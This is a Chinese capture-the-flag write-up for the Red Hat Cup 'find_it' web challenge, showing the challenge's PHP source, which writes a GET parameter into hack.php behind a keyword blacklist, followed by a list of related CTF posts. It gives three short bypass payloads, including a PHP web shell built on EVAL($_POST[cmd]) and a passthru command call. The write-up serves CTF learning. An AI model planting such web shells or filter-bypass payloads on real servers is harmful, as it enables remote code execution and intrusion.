红帽杯find_it
随便坐一坐
<?php $link = mysql_connect('localhost', 'ctfhub', 'ctfhub'); ?>
<html>
<head><title>Hello worldd!</title><style>body {background-color: white;text-align: center;padding: 50px;font-family: "Open Sans","Helvetica Neue",Helvetica,Arial,sans-serif;}#logo {margin-bottom: 40px;}</style>
</head>
<body><img id="logo" src="logo.png" /><h1><?php echo "Hello My freind!"; ?></h1><?php if($link) { ?><h2>I Can't view my php files?!</h2><?php } else { ?><h2>MySQL Server version: <?php echo mysql_get_server_info(); ?></h2><?php } ?>
</body>
</html>
<?php#Really easy...$file=fopen("flag.php","r") or die("Unable 2 open!");$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));$hack=fopen("hack.php","w") or die("Unable 2 open");$a=$_GET['code'];if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){die("you die");
}
if(strlen($a)>33){die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);fclose($file);
fclose($hack);
?>
fopen() 函数打开文件或者 URL
fwrite — 写入文件(可安全用于二进制文件)
fread ( resource $handle , int $length ) : string 最多读length个
三种方法随便挑 感觉还是第一个最简单
$a = "<?= passthru('ls'); ?>";
$a = "<?= EVAL($_POST[cmd]); ?>"
$a = "<?= show_source(glob('./*')); ?>
红帽杯find_it相关推荐
- 面向萌新的红帽杯2018线上赛wp
网络安全攻防大赛第二届"红帽杯"网络安全攻防大赛(除了web3 guess id,不会做.没写.) misc2 Not Only Wireshark 下载流量包,wireshark ...
- BUUCTF-[2019红帽杯]SnakeDig the way
[2019红帽杯]Snake 题目下载:下载 下载完文件是一个用C#编写的untiy程序,对于这种程序果断用dnSpy查看Assembly-CSharp.dll 找到如下位置 发现这些函数都导入了In ...
- [CTFHub] 2021-第四届红帽杯网络安全大赛-Web-find_it
[CTFHub] 2021-第四届红帽杯网络安全大赛-Web-find_it 看群里说CTFHub上复现了, 我来看看 本来想按照红帽杯的套路来试一下,发现phpinfo里莫得flag了 只能想想其他 ...
- CTFHub_2021-第四届红帽杯网络安全大赛-Web-WebsiteManger
CTFHub_2021-第四届红帽杯网络安全大赛-Web-WebsiteManger(布尔盲注.SSRF ) 场景描述:最新的网站测试器,作为非站长的你,能利用好它的功能吗? 场景打开后,如下,是个登 ...
- awd赛题的flag是什么意思_红帽杯线下赛AWD题目分析
上周打了一场红帽杯的线下赛,可惜开具发挥失误服务器down了几轮一度垫底-最后才又勉强上了点儿分-..赛后对题目中的几处比较有意义的漏洞做了一下分析,写出了下面篇文章. web1 web1是一个wor ...
- 红帽杯2021 Misc
红帽杯2021 Misc 签到 colorful code PicPic 签到 根据附件文件名EBCDIC,可知是编码问题,转换即可,这里可以采用 010 Editor flag为flag{we1c0 ...
- 2021第四届红帽杯网络安全大赛-线上赛Writeup
文章目录 MISC 签到 colorful code WEB find_it framework WebsiteManger ezlight 记录一下被锤爆的一天-orz MISC 签到 签到抢了个二 ...
- 第四届红帽杯网络安全大赛 Web 部分writeup
前言 记录一下web的wp,随手写的,只会前三题,确实都很简单. find_it 扫到robots.txt,发现1ndexx.php,直接访问不了,访问.1ndexx.php.swp得到源码,然后读f ...
- 红帽杯——childRE
查壳 拖进ida main函数 signed __int64 main() {signed __int64 v0; // rax__int64 v1; // raxconst CHAR *v2; // ...
最新文章
- managedwifi.codeplex.com
- 2018-2019-1 20165223 20165218 实验二 固件程序设计
- 数学建模之运筹学问题
- php商品评价代码,php商品对比功能代码分享
- 安装android开发环境
- QQ 临时会话+图标 HTML代码
- 怎样测试通达信软件,如何测试通达信指标成功率?
- 巨人肩膀之线性表简介
- Python图像处理(Pillow/PIL)入门
- Redis底层数据结构——跳跃列表
- 51单片机——ADC模数转换、DAC数模转换PWM C语言入门编程
- 使用three.js模拟城市灯光秀
- 六种黑客入侵手机的常见方式
- Ai-WB1系列驱动4.0寸电阻触摸屏运行LVGL v8.3
- python输出奇数数字序列_python在一串数字中选出奇数-女性时尚流行美容健康娱乐mv-ida网...
- 将AE开发的专题图制作功能发布为WPS
- python图片合成视频
- MySQL加索引及导数导致的问题
- 阿里云天池机器学习task1
- 基于ubuntu环境搭建janus服务器